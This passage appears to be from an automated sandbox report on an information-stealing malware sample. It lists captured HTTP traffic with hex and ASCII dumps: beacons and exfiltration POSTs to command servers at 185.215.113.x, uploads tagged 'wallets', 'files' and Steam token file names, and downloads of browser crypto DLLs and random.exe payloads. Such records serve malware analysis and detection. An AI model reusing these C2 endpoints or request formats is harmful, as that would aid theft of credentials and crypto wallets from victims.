65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 4b 46 49 45 42 47 43 41 41 46 49 45 42 46 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 4b 46 49 45 42 47 43 41 41 46 49 45 42 46 43 41 45 2d 2d 0d 0a Data Ascii: ------GCBKFIEBGCAAFIEBFCAEContent-Disposition: form-data; name="token"db796f16d102ac7e6fa57b878d381d4b8b2ccaa9369a700a0e6694ec18136f53f550eb0e------GCBKFIEBGCAAFIEBFCAEContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GCBKFIEBGCAAFIEBFCAEContent-Disposition: form-data; name="file"------GCBKFIEBGCAAFIEBFCAE--
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 31 34 31 43 45 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A141CEF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /ZhnSMEmOyBahvsfTCosA1738232489 HTTP/1.1Host: home.fivegg5th.topAccept: /Content-Type: application/jsonContent-Length: 31Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 31 34 31 43 45 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A141CEF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 36 32 31 35 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1062150001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Sat, 01 Feb 2025 16:13:50 GMTIf-None-Match: "679e483e-1bcc00"
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 31 34 31 43 45 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A141CEF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 31 34 31 43 45 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A141CEF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 31 34 31 43 45 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A141CEF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 36 32 31 35 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1062151001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 31 34 31 43 45 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A141CEF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 31 34 31 43 45 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A141CEF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 31 34 31 43 45 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A141CEF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKFHJJDHJEGHJKECBGCFHost: 185.215.113.115Content-Length: 1003Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 31 34 31 43 45 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A141CEF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJDGDBFCBKFHJKFHCBKHost: 185.215.113.115Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 44 47 44 42 46 43 42 4b 46 48 4a 4b 46 48 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 62 37 39 36 66 31 36 64 31 30 32 61 63 37 65 36 66 61 35 37 62 38 37 38 64 33 38 31 64 34 62 38 62 32 63 63 61 61 39 33 36 39 61 37 30 30 61 30 65 36 36 39 34 65 63 31 38 31 33 36 66 35 33 66 35 35 30 65 62 30 65 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 44 47 44 42 46 43 42 4b 46 48 4a 4b 46 48 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 44 47 44 42 46 43 42 4b 46 48 4a 4b 46 48 43 42 4b 2d 2d 0d 0a Data Ascii: ------GHJDGDBFCBKFHJKFHCBKContent-Disposition: form-data; name="token"db796f16d102ac7e6fa57b878d381d4b8b2ccaa9369a700a0e6694ec18136f53f550eb0e------GHJDGDBFCBKFHJKFHCBKContent-Disposition: form-data; name="message"wallets------GHJDGDBFCBKFHJKFHCBK--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAKFBKEHDBGHJJKFIEGDHost: 185.215.113.115Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 4b 46 42 4b 45 48 44 42 47 48 4a 4a 4b 46 49 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 62 37 39 36 66 31 36 64 31 30 32 61 63 37 65 36 66 61 35 37 62 38 37 38 64 33 38 31 64 34 62 38 62 32 63 63 61 61 39 33 36 39 61 37 30 30 61 30 65 36 36 39 34 65 63 31 38 31 33 36 66 35 33 66 35 35 30 65 62 30 65 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 46 42 4b 45 48 44 42 47 48 4a 4a 4b 46 49 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 46 42 4b 45 48 44 42 47 48 4a 4a 4b 46 49 45 47 44 2d 2d 0d 0a Data Ascii: ------BAKFBKEHDBGHJJKFIEGDContent-Disposition: form-data; name="token"db796f16d102ac7e6fa57b878d381d4b8b2ccaa9369a700a0e6694ec18136f53f550eb0e------BAKFBKEHDBGHJJKFIEGDContent-Disposition: form-data; name="message"files------BAKFBKEHDBGHJJKFIEGD--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 36 32 31 35 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1062152001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 31 34 31 43 45 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A141CEF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAEHJJKFCAAFHJKFBKKHost: 185.215.113.115Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 41 45 48 4a 4a 4b 46 43 41 41 46 48 4a 4b 46 42 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 62 37 39 36 66 31 36 64 31 30 32 61 63 37 65 36 66 61 35 37 62 38 37 38 64 33 38 31 64 34 62 38 62 32 63 63 61 61 39 33 36 39 61 37 30 30 61 30 65 36 36 39 34 65 63 31 38 31 33 36 66 35 33 66 35 35 30 65 62 30 65 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 45 48 4a 4a 4b 46 43 41 41 46 48 4a 4b 46 42 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 45 48 4a 4a 4b 46 43 41 41 46 48 4a 4b 46 42 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 45 48 4a 4a 4b 46 43 41 41 46 48 4a 4b 46 42 4b 4b 2d 2d 0d 0a Data Ascii: ------HCAEHJJKFCAAFHJKFBKKContent-Disposition: form-data; name="token"db796f16d102ac7e6fa57b878d381d4b8b2ccaa9369a700a0e6694ec18136f53f550eb0e------HCAEHJJKFCAAFHJKFBKKContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------HCAEHJJKFCAAFHJKFBKKContent-Disposition: form-data; name="file"------HCAEHJJKFCAAFHJKFBKK--
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /test/exe/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IECFBKFHCAEHJJKEGDGHHost: 185.215.113.115Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 43 46 42 4b 46 48 43 41 45 48 4a 4a 4b 45 47 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 62 37 39 36 66 31 36 64 31 30 32 61 63 37 65 36 66 61 35 37 62 38 37 38 64 33 38 31 64 34 62 38 62 32 63 63 61 61 39 33 36 39 61 37 30 30 61 30 65 36 36 39 34 65 63 31 38 31 33 36 66 35 33 66 35 35 30 65 62 30 65 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 46 42 4b 46 48 43 41 45 48 4a 4a 4b 45 47 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 46 42 4b 46 48 43 41 45 48 4a 4a 4b 45 47 44 47 48 2d 2d 0d 0a Data Ascii: ------IECFBKFHCAEHJJKEGDGHContent-Disposition: form-data; name="token"db796f16d102ac7e6fa57b878d381d4b8b2ccaa9369a700a0e6694ec18136f53f550eb0e------IECFBKFHCAEHJJKEGDGHContent-Disposition: form-data; name="message"ybncbhylepme------IECFBKFHCAEHJJKEGDGH--
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 31 34 31 43 45 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A141CEF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJJJKEHCAKFBFHJKEHCHost: 185.215.113.115Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 4a 4b 45 48 43 41 4b 46 42 46 48 4a 4b 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 62 37 39 36 66 31 36 64 31 30 32 61 63 37 65 36 66 61 35 37 62 38 37 38 64 33 38 31 64 34 62 38 62 32 63 63 61 61 39 33 36 39 61 37 30 30 61 30 65 36 36 39 34 65 63 31 38 31 33 36 66 35 33 66 35 35 30 65 62 30 65 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 4a 4b 45 48 43 41 4b 46 42 46 48 4a 4b 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 4a 4b 45 48 43 41 4b 46 42 46 48 4a 4b 45 48 43 2d 2d 0d 0a Data Ascii: ------HJJJJKEHCAKFBFHJKEHCContent-Disposition: form-data; name="token"db796f16d102ac7e6fa57b878d381d4b8b2ccaa9369a700a0e6694ec18136f53f550eb0e------HJJJJKEHCAKFBFHJKEHCContent-Disposition: form-data; name="message"wkkjqaiaxkhb------HJJJJKEHCAKFBFHJKEHC--
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 31 34 31 43 45 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A141CEF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
